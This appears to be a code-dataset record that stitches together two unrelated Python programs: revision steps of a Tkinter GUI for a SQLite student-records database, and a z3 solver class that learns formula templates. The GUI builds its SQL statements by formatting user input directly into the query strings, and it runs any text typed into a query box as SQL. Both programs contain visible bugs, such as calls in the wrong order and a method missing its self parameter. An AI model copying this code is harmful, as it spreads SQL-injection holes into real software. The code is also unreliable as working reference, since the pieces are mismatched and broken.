create_table(self):\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n self.table_name = StringVar()\n l = Label(self.top, text='Table', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack()\n e = Entry(self.top, textvariable=self.table_name, font=('times', 20,\n 'bold'))\n e.pack()\n b = Button(self.top, text='Add field', command=self.fun_show, font=\n ('times', 20, 'bold'), bg='white', fg='black')\n b.pack()\n b = Button(self.top, text='OK', font=('times', 20, 'bold'), command\n =self.show_entered_data, bg='white', fg='black')\n b.pack(side=RIGHT)\n\n def show_entered_data(self):\n global en1\n global en2\n global list1\n global tbl_name\n self.tbl_name = self.table_name.get()\n self.en1 = self.entry1.get()\n self.en2 = self.entry2.get()\n sent = 'Create table ' + str(self.tbl_name) + \"('\" + str(self.en1\n ) + ' ' + str(self.en2) + \"')\"\n list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))\n list1.place(x=0, y=0)\n list1.insert(0.0, sent)\n print(self.tbl_name, self.en1, self.en2)\n self.cursor.execute(sent)\n self.list.insert(0, sent)\n self.connection.commit()\n\n def fun_show(self):\n l = Label(self.top, text='Name', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack(side=TOP)\n self.entry1 = StringVar()\n e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20,\n 'bold'))\n e1.pack()\n l = Label(self.top, text='type', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack(side=TOP)\n self.entry2 = StringVar()\n e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20,\n 'bold'))\n e1.pack()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Gui:\n\n def __init__(self):\n global en3\n self.scr = Tk()\n self.scr.geometry('2000x3000')\n self.scr.title('VIEWING DATABASE')\n self.connection = sqlite3.connect('student_details.db')\n self.cursor = self.connection.cursor()\n self.id = StringVar()\n self.name1 = StringVar()\n self.fathername = StringVar()\n self.mothername = StringVar()\n self.cont = StringVar()\n self.email = StringVar()\n self.f1 = Frame(self.scr, bg='brown1')\n self.f1.pack(side=TOP)\n self.left_frame = Frame(self.scr, bg='red')\n self.left_frame.pack(side=LEFT, fill=Y)\n self.right_frame = Frame(self.scr, width=3000, bg='yellow')\n self.right_frame.pack(side=LEFT, fill=Y)\n l = Label(self.right_frame, text=\n '***************SHOW TABLE RECORDS IN A DATABASE******************'\n , font=('times', 25, 'bold'), bg='black', fg='white')\n l.pack(side=TOP, fill=X)\n scrollbar = Scrollbar(self.right_frame)\n scrollbar.pack(side=RIGHT, fill=Y)\n self.list = Listbox(self.right_frame, width=61, height=12, font=(\n 'times', 25, 'bold'), yscrollcommand=scrollbar.set)\n self.list.bind('student_list', self.show_records)\n self.list.pack(side=TOP, fill=Y)\n scrollbar.config(command=self.list.yview)\n self.querry_frame = Frame(self.right_frame, width=81, height=5, bg=\n 'white')\n self.querry_frame.pack(side=BOTTOM, fill=X)\n self.en3 = Entry(self.querry_frame, font=('times', 25, 'bold'))\n self.en3.pack(side=BOTTOM, fill=X)\n b = Button(self.querry_frame, text='Enter', command=self.sample,\n font=('times', 25, 'bold'), bg='white', fg='black')\n b.pack(side=RIGHT)\n b1 = Button(self.querry_frame, text='Save', command=self.show_data,\n font=('times', 25, 'bold'), bg='white', fg='black')\n b1.pack(side=RIGHT)\n b = Button(self.f1, text='OPEN', command=self.file, font=('times', \n 25, 'bold'), bg='white', fg='black')\n b.pack(side=LEFT)\n b = Button(self.f1, text='CREATE', command=self.create_table, font=\n ('times', 25, 'bold'), bg='white', fg='black')\n b.pack(side=LEFT)\n b1 = Button(self.f1, text='INSERT', command=self.add_record, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b1.pack(side=LEFT)\n b2 = Button(self.f1, text='DELETE', command=self.del_rec, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b2.pack(side=LEFT)\n b3 = Button(self.f1, text='UPDATE', command=self.update, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b3.pack(side=RIGHT)\n b4 = Button(self.f1, text='VIEW', command=lambda : self.view_table(\n ), font=('times', 25, 'bold'), bg='white', fg='black')\n b4.pack(side=RIGHT)\n b4 = Button(self.f1, text='BROWSE', command=self.show_data, font=(\n 'times', 25, 'bold'), bg='white', fg='black')\n b4.pack(side=RIGHT)\n l = Label(self.left_frame, text='View Table in Database', font=(\n 'times', 25, 'bold'), bg='blue', fg='white')\n l.pack(side=TOP, fill=X)\n self.scr.mainloop()\n try:\n self.cursor.execute(\n 'create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))'\n )\n self.connection.commit()\n except:\n pass\n\n def insert_data(self):\n self.id = e.get()\n self.name1 = e1.get()\n self.fathername = e2.get()\n self.mothername = e3.get()\n self.cont = e4.get()\n self.email = e5.get()\n self.cursor.execute(\n \"insert into user values('{}','{}','{}','{}','{}','{}')\".format\n (self.id, self.name1, self.fathername, self.mothername, self.\n cont, self.email))\n self.connection.commit()\n\n def show_data(self):\n self.connection = sqlite3.connect('student_details.db')\n self.cursor = self.connection.cursor()\n self.cursor.execute('Select * from user')\n rows = self.cursor.fetchall()\n for row in rows:\n l1 = self.list.insert(END, row)\n self.connection.commit()\n\n def update_data(self):\n self.cursor.execute(\"Update user set {} = '{}' where id ='{}'\".\n format(e2.get(), e3.get(), e.get()))\n self.connection.commit()\n self.list.delete(0, END)\n self.show_data()\n\n def update(self):\n global e\n global e2\n global e3\n self.top1 = Toplevel(self.scr)\n self.top1.geometry('400x400')\n l1 = Label(self.top1, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top1, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n self.col_name = StringVar()\n l2 = Label(self.top1, text='col_name', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top1, relief='sunken', textvariable=self.col_name,\n font=('times', 25, 'bold'))\n e2.pack()\n self.value = StringVar()\n l3 = Label(self.top1, text='VALUE', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l3.pack()\n e3 = Entry(self.top1, relief='sunken', textvariable=self.value,\n font=('times', 25, 'bold'))\n e3.pack()\n b = Button(self.top1, text='UPDATE', command=self.update_data, font\n =('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top1.mainloop()\n\n def delete_data(self):\n self.cursor.execute(\"Delete from user where id ='{}'\".format(e.get()))\n self.list.delete(0, END)\n self.connection.commit()\n self.show_data()\n\n def del_rec(self):\n global e\n self.top2 = Toplevel(self.scr)\n self.top2.geometry('400x400')\n l1 = Label(self.top2, text='USER_ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n self.Id = StringVar()\n e = Entry(self.top2, relief='sunken', textvariable=self.Id, font=(\n 'times', 25, 'bold'))\n e.pack()\n b = Button(self.top2, text='delete records', command=self.\n delete_data, font=('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top2.mainloop()\n\n def sample(self):\n s = '{}'.format(self.en3.get())\n a = self.cursor.execute('{}'.format(self.en3.get()))\n r = self.cursor.fetchall()\n for row in r:\n self.list.insert(0, row)\n self.connection.commit()\n\n def file(self):\n self.f1.filename = filedialog.askopenfilename(title='Select file')\n p = self.f1.filename\n self.list.insert(0, self.f1.filename)\n\n def add_record(self):\n global e\n global e1\n global e2\n global e3\n global e4\n global e5\n self.e = StringVar()\n self.e1 = StringVar()\n self.e2 = StringVar()\n self.e3 = StringVar()\n self.e4 = StringVar()\n self.e5 = StringVar()\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n l = Label(self.top, text='USER_ID', font=('times', 25, 'bold'), bg=\n 'green2', fg='white')\n l.pack()\n e = Entry(self.top, relief='sunken', textvariable=self.e, font=(\n 'times', 25, 'bold'))\n e.pack()\n l1 = Label(self.top, text='USERNAME', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l1.pack()\n e1 = Entry(self.top, relief='sunken', textvariable=self.e1, font=(\n 'times', 25, 'bold'))\n e1.pack()\n l2 = Label(self.top, text='FATHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l2.pack()\n e2 = Entry(self.top, relief='sunken', textvariable=self.e2, font=(\n 'times', 25, 'bold'))\n e2.pack()\n l3 = Label(self.top, text='MOTHERS NAME', font=('times', 25, 'bold'\n ), bg='green2', fg='white')\n l3.pack()\n e3 = Entry(self.top, relief='sunken', textvariable=self.e3, font=(\n 'times', 25, 'bold'))\n e3.pack()\n l4 = Label(self.top, text='CONTACT NO', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l4.pack()\n e4 = Entry(self.top, relief='sunken', textvariable=self.e4, font=(\n 'times', 25, 'bold'))\n e4.pack()\n l5 = Label(self.top, text='E-MAIL ID', font=('times', 25, 'bold'),\n bg='green2', fg='white')\n l5.pack()\n e5 = Entry(self.top, relief='sunken', textvariable=self.e5, font=(\n 'times', 25, 'bold'))\n e5.pack()\n varchk = IntVar()\n b = Button(self.top, text='SUBMIT', command=self.insert_data, font=\n ('times', 25, 'bold'), bg='white', fg='black')\n b.pack()\n self.top.mainloop()\n\n def view_table(self):\n global list_box\n self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))\n try:\n self.list_box.insert(1, 'user')\n self.list_box.insert(2, self.tbl_name)\n except:\n pass\n b = Button(self.left_frame, text='Click', font=('times', 20, 'bold'\n ), command=self.selection, bg='white', fg='black')\n b.place(x=100, y=400)\n self.list_box.place(x=10, y=50)\n\n def selection(self):\n lb = self.list_box.curselection()\n print(lb)\n for i in list(lb):\n self.show_data()\n\n def show_records(self):\n global m\n m = self.list.curselection()\n m = self.list.get(m)\n self.id.delete(0, END)\n self.id.insert(END, self.add_record())\n global table_name\n\n def create_table(self):\n self.top = Toplevel(self.scr)\n self.top.geometry('400x800')\n self.table_name = StringVar()\n l = Label(self.top, text='Table', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack()\n e = Entry(self.top, textvariable=self.table_name, font=('times', 20,\n 'bold'))\n e.pack()\n b = Button(self.top, text='Add field', command=self.fun_show, font=\n ('times', 20, 'bold'), bg='white', fg='black')\n b.pack()\n b = Button(self.top, text='OK', font=('times', 20, 'bold'), command\n =self.show_entered_data, bg='white', fg='black')\n b.pack(side=RIGHT)\n\n def show_entered_data(self):\n global en1\n global en2\n global list1\n global tbl_name\n self.tbl_name = self.table_name.get()\n self.en1 = self.entry1.get()\n self.en2 = self.entry2.get()\n sent = 'Create table ' + str(self.tbl_name) + \"('\" + str(self.en1\n ) + ' ' + str(self.en2) + \"')\"\n list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))\n list1.place(x=0, y=0)\n list1.insert(0.0, sent)\n print(self.tbl_name, self.en1, self.en2)\n self.cursor.execute(sent)\n self.list.insert(0, sent)\n self.connection.commit()\n\n def fun_show(self):\n l = Label(self.top, text='Name', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack(side=TOP)\n self.entry1 = StringVar()\n e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20,\n 'bold'))\n e1.pack()\n l = Label(self.top, text='type', font=('times', 20, 'bold'), bg=\n 'white', fg='black')\n l.pack(side=TOP)\n self.entry2 = StringVar()\n e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20,\n 'bold'))\n e1.pack()\n\n\nGui()\n",
"step-5": "from tkinter import*\r\nfrom tkinter import filedialog\r\nimport sqlite3\r\n\r\nclass Gui:\r\n def __init__(self):\r\n global en3\r\n self.scr = Tk()\r\n self.scr.geometry(\"2000x3000\")\r\n self.scr.title(\"VIEWING DATABASE\")\r\n self.connection = sqlite3.connect(\"student_details.db\")\r\n self.cursor = self.connection.cursor()\r\n self.id = StringVar()\r\n self.name1 = StringVar()\r\n self.fathername = StringVar()\r\n self.mothername = StringVar()\r\n self.cont = StringVar()\r\n self.email = StringVar()\r\n self.f1 = Frame(self.scr, bg='brown1')\r\n self.f1.pack(side=TOP)\r\n self.left_frame = Frame(self.scr, bg='red')\r\n self.left_frame.pack(side=LEFT, fill=Y)\r\n self.right_frame = Frame(self.scr, width=3000, bg='yellow')\r\n self.right_frame.pack(side=LEFT, fill=Y)\r\n l = Label(self.right_frame, text=\"***************SHOW TABLE RECORDS IN A DATABASE******************\",\r\n font=('times', 25, 'bold'), bg=\"black\", fg=\"white\")\r\n l.pack(side=TOP, fill=X)\r\n scrollbar = Scrollbar(self.right_frame)\r\n scrollbar.pack(side=RIGHT, fill=Y)\r\n self.list = Listbox(self.right_frame, width=61, height=12, font=('times', 25, 'bold'),\r\n yscrollcommand=scrollbar.set)\r\n self.list.bind(\"student_list\", self.show_records)\r\n self.list.pack(side=TOP, fill=Y)\r\n scrollbar.config(command=self.list.yview)\r\n self.querry_frame = Frame(self.right_frame, width=81, height=5, bg=\"white\")\r\n self.querry_frame.pack(side=BOTTOM, fill=X)\r\n self.en3 = Entry(self.querry_frame, font=('times', 25, 'bold'))\r\n self.en3.pack(side=BOTTOM, fill=X)\r\n b = Button(self.querry_frame, text=\"Enter\",command=self.sample, font=('times', 25, 'bold'), bg=\"white\", fg=\"black\")\r\n b.pack(side=RIGHT)\r\n b1 = Button(self.querry_frame, text=\"Save\", command=self.show_data, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b1.pack(side=RIGHT)\r\n b = Button(self.f1, text=\"OPEN\", command=self.file, font=('times', 25, 'bold'), bg=\"white\", fg=\"black\")\r\n b.pack(side=LEFT)\r\n b = Button(self.f1, text=\"CREATE\", command=self.create_table, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b.pack(side=LEFT)\r\n b1 = Button(self.f1, text=\"INSERT\", command=self.add_record, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b1.pack(side=LEFT)\r\n b2 = Button(self.f1, text=\"DELETE\", command=self.del_rec, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b2.pack(side=LEFT)\r\n b3 = Button(self.f1, text=\"UPDATE\", command=self.update, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b3.pack(side=RIGHT)\r\n b4 = Button(self.f1, text=\"VIEW\", command=lambda: self.view_table(), font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b4.pack(side=RIGHT)\r\n b4 = Button(self.f1, text=\"BROWSE\", command=self.show_data, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b4.pack(side=RIGHT)\r\n l = Label(self.left_frame, text=\"View Table in Database\", font=('times', 25, 'bold'), bg='blue', fg='white')\r\n l.pack(side=TOP, fill=X)\r\n\r\n self.scr.mainloop()\r\n\r\n try:\r\n self.cursor.execute(\"create table user(Id varchar(10),Name varchar(30),FathersName varchar(20),MothersName varchar(20),Contact varchar(10),Email varchar(30))\")\r\n self.connection.commit()\r\n except:\r\n pass\r\n\r\n def insert_data(self):\r\n self.id = e.get()\r\n self.name1 = e1.get()\r\n self.fathername=e2.get()\r\n self.mothername = e3.get()\r\n self.cont = e4.get()\r\n self.email = e5.get()\r\n self.cursor.execute(\"insert into user values('{}','{}','{}','{}','{}','{}')\".format(self.id,self.name1, self.fathername,self.mothername,self.cont , self.email))\r\n self.connection.commit()\r\n\r\n\r\n def show_data(self):\r\n self.connection = sqlite3.connect(\"student_details.db\")\r\n self.cursor = self.connection.cursor()\r\n self.cursor.execute(\"Select * from user\")\r\n rows = self.cursor.fetchall()\r\n for row in rows:\r\n l1 = self.list.insert(END, row)\r\n self.connection.commit()\r\n\r\n def update_data(self):\r\n self.cursor.execute(\"Update user set {} = '{}' where id ='{}'\".format(e2.get(),e3.get(),e.get()))\r\n self.connection.commit()\r\n self.list.delete(0, END)\r\n self.show_data()\r\n\r\n def update(self):\r\n global e\r\n global e2\r\n global e3\r\n self.top1 = Toplevel(self.scr)\r\n self.top1.geometry(\"400x400\")\r\n l1 = Label(self.top1, text=\"USER_ID\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l1.pack()\r\n self.Id=StringVar()\r\n e = Entry(self.top1, relief=\"sunken\", textvariable=self.Id, font=('times', 25, 'bold'))\r\n e.pack()\r\n self.col_name=StringVar()\r\n l2 = Label(self.top1, text=\"col_name\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l2.pack()\r\n e2 = Entry(self.top1, relief=\"sunken\", textvariable=self.col_name, font=('times', 25, 'bold'))\r\n e2.pack()\r\n self.value=StringVar()\r\n l3 = Label(self.top1, text=\"VALUE\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l3.pack()\r\n e3 = Entry(self.top1, relief=\"sunken\", textvariable=self.value, font=('times', 25, 'bold'))\r\n e3.pack()\r\n b = Button(self.top1, text=\"UPDATE\", command=self.update_data, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b.pack()\r\n\r\n self.top1.mainloop()\r\n\r\n def delete_data(self):\r\n self.cursor.execute(\"Delete from user where id ='{}'\".format(e.get()))\r\n self.list.delete(0,END)\r\n self.connection.commit()\r\n self.show_data()\r\n\r\n def del_rec(self):\r\n global e\r\n self.top2 = Toplevel(self.scr)\r\n self.top2.geometry(\"400x400\")\r\n l1 = Label(self.top2, text=\"USER_ID\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l1.pack()\r\n self.Id = StringVar()\r\n e = Entry(self.top2, relief=\"sunken\", textvariable=self.Id, font=('times', 25, 'bold'))\r\n e.pack()\r\n b = Button(self.top2, text=\"delete records\", command=self.delete_data, font=('times', 25, 'bold'), bg=\"white\",\r\n fg=\"black\")\r\n b.pack()\r\n self.top2.mainloop()\r\n\r\n def sample(self):\r\n s=('{}'.format(self.en3.get()))\r\n a=self.cursor.execute(\"{}\".format(self.en3.get()))\r\n r=self.cursor.fetchall()\r\n for row in r:\r\n self.list.insert(0,row)\r\n self.connection.commit()\r\n\r\n\r\n\r\n def file(self):\r\n self.f1.filename = filedialog.askopenfilename( title=\"Select file\")\r\n p=self.f1.filename\r\n self.list.insert(0,self.f1.filename)\r\n\r\n def add_record(self):\r\n global e\r\n global e1\r\n global e2\r\n global e3\r\n global e4\r\n global e5\r\n self.e = StringVar()\r\n self.e1 = StringVar()\r\n self.e2 = StringVar()\r\n self.e3 = StringVar()\r\n self.e4 = StringVar()\r\n self.e5 = StringVar()\r\n self.top=Toplevel(self.scr)\r\n self.top.geometry(\"400x800\")\r\n l=Label(self.top,text=\"USER_ID\",font=('times',25,'bold'),bg=\"green2\",fg=\"white\")\r\n l.pack()\r\n e=Entry(self.top,relief=\"sunken\",textvariable=self.e,font=('times',25,'bold'))\r\n e.pack()\r\n l1 = Label(self.top, text=\"USERNAME\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l1.pack()\r\n e1 = Entry(self.top, relief=\"sunken\",textvariable=self.e1, font=('times', 25, 'bold'))\r\n e1.pack()\r\n l2 = Label(self.top, text=\"FATHERS NAME\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l2.pack()\r\n e2 = Entry(self.top, relief=\"sunken\",textvariable=self.e2, font=('times', 25, 'bold'))\r\n e2.pack()\r\n l3 = Label(self.top, text=\"MOTHERS NAME\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l3.pack()\r\n e3 = Entry(self.top, relief=\"sunken\",textvariable=self.e3, font=('times', 25, 'bold'))\r\n e3.pack()\r\n l4 = Label(self.top, text=\"CONTACT NO\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l4.pack()\r\n e4 = Entry(self.top, relief=\"sunken\",textvariable=self.e4, font=('times', 25, 'bold'))\r\n e4.pack()\r\n l5 = Label(self.top, text=\"E-MAIL ID\", font=('times', 25, 'bold'), bg=\"green2\", fg=\"white\")\r\n l5.pack()\r\n e5 = Entry(self.top, relief=\"sunken\",textvariable=self.e5, font=('times', 25, 'bold'))\r\n e5.pack()\r\n varchk=IntVar()\r\n b = Button(self.top, text=\"SUBMIT\", command=self.insert_data,font=('times', 25, 'bold'), bg=\"white\",fg=\"black\")\r\n b.pack()\r\n self.top.mainloop()\r\n\r\n\r\n def view_table(self):\r\n global list_box\r\n self.list_box = Listbox(self.left_frame, font=('times', 20, 'bold'))\r\n\r\n try:\r\n\r\n self.list_box.insert(1,\"user\")\r\n self.list_box.insert(2,self.tbl_name)\r\n except:\r\n pass\r\n b=Button(self.left_frame,text=\"Click\",font=('times', 20, 'bold'),command=self.selection,bg=\"white\",fg=\"black\")\r\n b.place(x=100,y=400)\r\n self.list_box.place(x=10,y=50)\r\n\r\n def selection(self):\r\n lb = self.list_box.curselection()\r\n print(lb)\r\n for i in list(lb):\r\n self.show_data()\r\n\r\n def show_records(self):\r\n global m\r\n m=self.list.curselection()\r\n m=self.list.get(m)\r\n self.id.delete(0,END)\r\n self.id.insert(END,self.add_record())\r\n\r\n global table_name\r\n\r\n def create_table(self):\r\n self.top = Toplevel(self.scr)\r\n self.top.geometry(\"400x800\")\r\n self.table_name=StringVar()\r\n l=Label(self.top,text=\"Table\",font=('times', 20, 'bold'),bg=\"white\",fg=\"black\")\r\n l.pack()\r\n e=Entry(self.top,textvariable=self.table_name,font=('times', 20, 'bold'))\r\n e.pack()\r\n b=Button(self.top,text=\"Add field\",command=self.fun_show , font=('times', 20, 'bold'),bg=\"white\",fg=\"black\")\r\n b.pack()\r\n b=Button(self.top,text=\"OK\",font=('times', 20, 'bold'),command=self.show_entered_data,bg=\"white\",fg=\"black\")\r\n b.pack(side=RIGHT)\r\n\r\n\r\n def show_entered_data(self):\r\n global en1\r\n global en2\r\n global list1\r\n global tbl_name\r\n self.tbl_name=self.table_name.get()\r\n self.en1=self.entry1.get()\r\n self.en2=self.entry2.get()\r\n sent=\"Create table \"+str(self.tbl_name)+\"('\"+str(self.en1)+ \" \"+ str(self.en2)+\"')\"\r\n list1 = Text(self.top, width=41, height=8, font=('times', 25, 'bold'))\r\n list1.place(x=0,y=0)\r\n list1.insert(0.0,sent)\r\n print(self.tbl_name,self.en1,self.en2)\r\n self.cursor.execute(sent)\r\n self.list.insert(0,sent)\r\n self.connection.commit()\r\n\r\n\r\n def fun_show(self):\r\n l = Label(self.top, text=\"Name\", font=('times', 20, 'bold'), bg=\"white\", fg=\"black\")\r\n l.pack(side=TOP)\r\n self.entry1 = StringVar()\r\n e1 = Entry(self.top, textvariable=self.entry1, font=('times', 20, 'bold'))\r\n e1.pack()\r\n l = Label(self.top, text=\"type\", font=('times', 20, 'bold'), bg=\"white\", fg=\"black\")\r\n l.pack(side=TOP)\r\n self.entry2 = StringVar()\r\n e1 = Entry(self.top, textvariable=self.entry2, font=('times', 20, 'bold'))\r\n e1.pack()\r\n\r\n\r\nGui()",
"step-ids": [
9,
12,
17,
18,
20
]
}
|
[
9,
12,
17,
18,
20
] |
import random
from z3 import *
def combine(iter):
tmp_list = [i for i in iter]
res = tmp_list[0]
for i in tmp_list[1:]:
res += i
return res
def co_prime(num1, num2):
for num in range(2, min(num1, num2) + 1):
if num1 % num == 0 and num2 % num == 0:
return False
return True
def gcd(*nums):
min_num = 1 << 32
for num in nums:
if num != 0:
min_num = min(min_num, abs(num))
for i in range(min_num, 1, -1):
flag = True
for num in nums:
if num % i != 0:
flag = False
break
if flag:
return i
return 1
class FormulaTemplate:
def __init__(self, vi ,w ,k, h, m ,timeout=3000000): ####加了w
self.k = k # amount of clause 多少个子句
self.h = h # number of inequality 第一类不等式数量上限
self.m = m # number of mode number 第二类不等式数量上限
self.w = w
self.vi = vi
n = len(vi)
self.n = n
self.aeij = [[Int('ae' + str(i) + str(j)) for j in range(n)] for i in range(h)]
self.bi = [Int('b' + str(i)) for i in range(h)]
self.amij = [[Int('am' + str(i) + str(j)) for j in range(n)] for i in range(m)]
self.ei = [Int('e' + str(i)) for i in range(m)] ##改成定值 , 写一个函数,从2开始一个个试????(还没实现)
self.ci = [Int('c' + str(i)) for i in range(m)]
self.heij = [[Bool('h_e' + str(j) + str(i)) for i in range(h)] for j in range(k)]
self.hgeij = [[Bool('h_ge' + str(j) + str(i)) for i in range(h)] for j in range(k)]
self.hleij = [[Bool('h_le' + str(j) + str(i)) for i in range(h)] for j in range(k)]
self.tij = [[Bool('t' + str(j) + str(i)) for i in range(m)] for j in range(k)]
self.ntij = [[Bool('nt' + str(j) + str(i)) for i in range(m)] for j in range(k)]
self.s = Solver()
for i in range(h):
# 不等式系数ae_ij不能全部为0
self.s.add(Or(*[a > 0 for a in self.aeij[i]]))
for j in range(i + 1, h):
self.s.add(Or(*[self.aeij[i][w] != self.aeij[j][w] for w in range(n)]))
for i in range(m):
# 模等式的系数am_ij不能全部小于等于0
self.s.add(Or(*[am > 0 for am in self.amij[i]]))
# 模等式的系数am_ij不能大于模e
self.s.add(*[And(0 <= am, am < self.ei[i]) for am in self.amij[i]])
# for j in range(i + 1, m):
# self.s.add(Or(self.ei[i] != self.ei[j],
# *[self.amij[i][w] != self.amij[j][w] for w in range(n)]))
# 余数c_i必须小于模e
self.s.add(*[And(self.ei[i] > self.ci[i], self.ci[i] >= 0) for i in range(m)])
# 模必须大于等于2,并且小于一定范围
self.s.add(*[And(e <= 10 * m, e >= 2) for e in self.ei])
for i in range(k):
# 判断条件一定有一个是False,避免逻辑出现False
for j in range(i + 1, k):
all_true = [And(self.heij[i][w], self.hgeij[i][w], self.hleij[i][w]) for w in range(h)]
all_true.extend([And(self.tij[i][w], self.ntij[i][w]) for w in range(m)])
struct_const = [Or(self.heij[i][w] != self.heij[j][w],
self.hgeij[i][w] != self.hgeij[j][w],
self.hleij[i][w] != self.hleij[j][w]) for w in range(h)]
struct_const.extend([Or(self.tij[i][w] != self.tij[j][w],
self.ntij[i][w] != self.ntij[j][w]) for w in range(m)])
self.s.add(Or(*struct_const, *all_true))
self.s.set("timeout", timeout)
def add(self, example, label):
self.s.add(self.encoding(example, label))
def check(self):
check = self.s.check()
if check == sat:
self.solve_model()
return check
def W_size(m):
return m+2
def encoding(self, example, label):
Equ = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) != self.bi[i] for i in range(self.h)]
Ge = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) >= self.bi[i] for i in range(self.h)]
Le = [combine(example[j] * self.aeij[i][j] for j in range(self.n)) <= self.bi[i] for i in range(self.h)]
Me = [combine(example[j] * self.amij[i][j] for j in range(self.n)) % self.ei[i] == self.ci[i] for i in
range(self.m)]
Tk = []
for k in range(self.k):
clause = []
clause.extend([Implies(self.heij[k][h], Equ[h]) for h in range(self.h)])
clause.extend([Implies(self.hgeij[k][h], Ge[h]) for h in range(self.h)])
clause.extend([Implies(self.hleij[k][h], Le[h]) for h in range(self.h)])
clause.extend([Implies(self.tij[k][m], Me[m]) for m in range(self.m)])
clause.extend([Implies(self.ntij[k][m], Not(Me[m])) for m in range(self.m)])
Tk.append(And(*clause))
# print("Or(*Tk) , label=\n",Or(*Tk),label)
return Or(*Tk) == label
def solve_model(self): #求出取值 ####加了w
print("w", self.w)
#W_size = [2,3,4,5,6,7,8,9]
model = self.s.model()
self.M = [[model[self.amij[i][j]].as_long() if model[self.amij[i][j]] is not None else 0
for j in range(self.n)]
for i in range(self.m)]
##用z3求解e(此处要改)
# self.E = [model[self.ei[i]].as_long() if model[self.ei[i]] is not None else 1 for i in range(self.m)]
# print("E= \n",self.E)
####改动
for i in range(self.m):
self.ei[i] = FormulaTemplate.W_size(self.w)
self.E = [self.ei[i] for i in range(self.m)]
print("E = \n",self.E)
####
self.C = [model[self.ci[i]].as_long() if model[self.ci[i]] is not None else 0 for i in range(self.m)]
self.A = [[model[self.aeij[i][j]].as_long() if model[self.aeij[i][j]] is not None else 0
for j in range(self.n)]
for i in range(self.h)]
self.B = [model[self.bi[i]].as_long() if model[self.bi[i]] is not None else 0 for i in range(self.h)]
self.He = [
[bool(model[self.heij[i][j]]) if model[self.heij[i][j]] is not None else False
for j in range(self.h)]
for i in range(self.k)
]
self.Hge = [
[bool(model[self.hgeij[i][j]]) if model[self.hgeij[i][j]] is not None else False
for j in range(self.h)]
for i in range(self.k)
]
self.Hle = [
[bool(model[self.hleij[i][j]]) if model[self.hleij[i][j]] is not None else False
for j in range(self.h)]
for i in range(self.k)
]
self.T = [
[bool(model[self.tij[i][j]]) if model[self.tij[i][j]] is not None else False
for j in range(self.m)]
for i in range(self.k)
]
self.Nt = [
[bool(model[self.ntij[i][j]]) if model[self.ntij[i][j]] is not None else False
for j in range(self.m)]
for i in range(self.k)
]
for i in range(self.m):
flag = True # 判断是否全部系数都相等
pix = -1
for am in self.M[i]:
if pix == -1:
if am != 0:
pix = am
elif am != 0 and am != pix:
flag = False
break
if flag: # 系数全部相同
if self.C[i] == 0:
# if co_prime(pix, self.E[i]):
# for j in range(self.n):
# if self.M[i][j] != 0:
# self.M[i][j] = 1
# else:
# div = gcd(pix, self.E[i])
# self.E[i] /= div
# for j in range(self.n):
# self.M[i][j] /= div
if not co_prime(pix, self.E[i]):
self.E[i] /= gcd(pix, self.E[i])
for j in range(self.n):
self.M[i][j] = 1
else:
div = gcd(pix, self.E[i], self.C[i])
self.E[i] /= div
self.C[i] /= div
pix /= div
for j in range(self.n):
self.M[i][j] /= div
div = gcd(int(pix), int(self.C[i]))
for j in range(self.n):
self.M[i][j] /= div
self.C[i] /= div
for i in range(self.h):
divisior = gcd(*self.A[i], self.B[i])
self.B[i] /= divisior
for j in range(self.n):
self.A[i][j] /= divisior
for i in range(len(self.E)):
self.E[i] = int(self.E[i])
